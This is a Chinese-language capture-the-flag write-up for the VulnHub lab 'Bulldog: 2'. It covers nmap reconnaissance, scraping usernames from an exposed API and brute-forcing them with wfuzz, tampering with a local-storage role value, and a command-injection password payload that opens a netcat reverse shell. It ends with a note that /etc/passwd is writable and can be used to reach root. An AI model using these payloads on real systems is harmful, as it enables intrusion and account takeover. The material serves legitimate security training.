Name: Bulldog: 2
Date release: 18 Jul 2018
自 Bulldog Industries 遭遇多次数据泄露以来已过去三年。
在那段时间里,他们已经恢复并重新命名为 Bulldog.social,一家即将上任的社交媒体公司。
你能接受这个新的挑战并在他们的生产网络服务器上扎根吗?
这是标准的 Boot-to-Root。您唯一的目标是进入根目录并看到祝贺消息,您如何做到这一点取决于您!
难度:中级,有一些你可能从未见过的东西。仔细考虑一切:)
我强烈建议在 VirtualBox 上运行它。此外,DHCP 已启用,因此您不应该有任何麻烦将其加入您的网络。它默认为桥接模式,但如果您愿意,可随意更改。
下载地址:https://www.vulnhub.com/entry/bulldog-2,246/
信息搜集
老规矩namp。
获取 ip 地址
1
2
3
4
5
6
7
|
$ nmap -sn 192.168.123.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-31 02:34 CST
Host is up (0.089s latency).
MAC Address: 88:2D:53:0D:85:6B (Unknown)
Nmap scan report for 192.168.123.199
Host is up.
Nmap done: 254 IP addresses (5 hosts up) scanned in 8.20 seconds
|
- 获取到目标 ip 为:192.168.123.199
扫描目标信息。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
|
$ nmap -sC -sV -vv -p- 192.168.123.199
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-31 02:34 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:34
Completed NSE at 02:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:34
Completed NSE at 02:34, 0.00s elapsed
Initiating ARP Ping Scan at 02:34
Scanning 192.168.123.199 [1 port]
Completed ARP Ping Scan at 02:34, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:34
Completed Parallel DNS resolution of 1 host. at 02:34, 0.00s elapsed
Initiating SYN Stealth Scan at 02:34
Scanning bulldog2.lan (192.168.123.199) [65535 ports]
Discovered open port 80/tcp on 192.168.123.199
SYN Stealth Scan Timing: About 19.61% done; ETC: 02:37 (0:02:07 remaining)
SYN Stealth Scan Timing: About 47.76% done; ETC: 02:37 (0:01:07 remaining)
Completed SYN Stealth Scan at 02:36, 104.58s elapsed (65535 total ports)
Initiating Service scan at 02:36
Scanning 1 service on bulldog2.lan (192.168.123.199)
Completed Service scan at 02:36, 6.01s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.123.199.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.12s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.00s elapsed
Nmap scan report for bulldog2.lan (192.168.123.199)
Host is up, received arp-response (0.00032s latency).
Scanned at 2018-10-31 02:34:55 CST for 111s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 nginx 1.14.0 (Ubuntu)
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-favicon: Unknown favicon MD5: B9AA7C338693424AAE99599BEC875B5F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Bulldog.social
MAC Address: 08:00:27:7C:BF:A8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.93 seconds
Raw packets sent: 131153 (5.771MB) | Rcvd: 252 (40.006KB)
|
信息分析
源码分析
打开http://192.168.123.199。
从 favicon.ico 发现这是一个 Angular 框架的网站。
检查源码获得版本:
<app-root _nghost-c0="" ng-version="4.4.7">
代理分析
打开 burpsuite 提交 /users 页面。
发现有可以 get 用户名。
url 为:http://192.168.123.199/users/getUsers?limit=9
- 里面是用户信息,大概一万多条,有了用户名,我们可以尝试爆破。
密码爆破
生成用户名
1
2
3
|
$ curl -s 192.168.123.199/users/getUsers | jq . | grep username | cut -d':' -f2 | cut -d'"' -f1 > usernames.txt
$ wc -l usernames.txt
15760 usernames.txt
|
使用 wfuzz 爆破
1
|
wfuzz -w usernames.txt -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -H"Content-Type: application/json" -H "Referer: http://192.168.123.199/login" -d "{\"username\":\"FUZZ\", \"password\": \"FUZ2Z\"}" -t 20 --hc 401 http://192.168.123.199/users/authenticate
|
- 时间太长,过程不表。
- 最后获取到的若口令帐号为:eivijay:12345。
- 然后登录。
本地存储权限绕过
打开 chrome,提取本地存储信息:
{"name":"Vijay Wells","username":"eivijay","email":"[email protected]","auth_level":"standard_user"
更改字段:standard_user 为管理员 master_admin_user。
{"name":"Vijay Wells","username":"eivijay","email":"[email protected]","auth_level":"master_admin_user"
刷新网页获取到 admin 的http://192.168.123.199/dashboard页面,而这个页面的密码字段可 getshell。
getshell
首先开启 nc 监听
密码字段 getshell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
POST /users/linkauthenticate HTTP/1.1
Host: 192.168.123.199
Content-Length: 50
Accept: application/json, text/plain, */*
Origin: http://192.168.123.199
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
DNT: 1
content-type: application/json
Referer: http://192.168.123.199/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{
"username": "icekam",
"password": "$(rm /tmp/sec;mkfifo /tmp/sec;cat /tmp/sec|/bin/sh -i 2>&1|nc 192.168.123.122 8922 >/tmp/sec"
}
|
反弹成功
1
2
3
4
5
|
$ nc -vlp 8922
listening on [any] 8922 ...
192.168.123.199: inverse host lookup failed: Unknown host
connect to [192.168.123.122] from (UNKNOWN) [192.168.123.199] 60210
/bin/sh: 0: can't access tty; job control turned off
|
提权
切换 ssh 模式
1
2
3
4
|
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ /bin/bash
/bin/bash
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$
|
系统信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ pwd
pwd
/var/www/node/Bulldog-2-The-Reckoning
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ cd /tmp
cd /tmp
node@bulldog2:/tmp$ cat /etc/passwd
cat /etc/passwd
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network❌100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve❌101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog❌102:106::/home/syslog:/usr/sbin/nologin
messagebus❌103:107::/nonexistent:/usr/sbin/nologin
_apt❌104:65534::/nonexistent:/usr/sbin/nologin
lxd❌105:65534::/var/lib/lxd/:/bin/false
uuidd❌106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq❌107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape❌108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate❌109:1::/var/cache/pollinate:/bin/false
sshd❌110:65534::/run/sshd:/usr/sbin/nologin
admin❌1000:1004:admin:/home/admin:/bin/bash
mongodb❌111:65534::/home/mongodb:/usr/sbin/nologin
node❌1001:1005:,,,:/home/node:/bin/bash”
|
- 发现 passwd 可读写,我们可以修改 root 密码或者新建一个 root 权限的用户即可拿到 flag。
心得
这个环境难度可以,主要考验信息搜集能力。
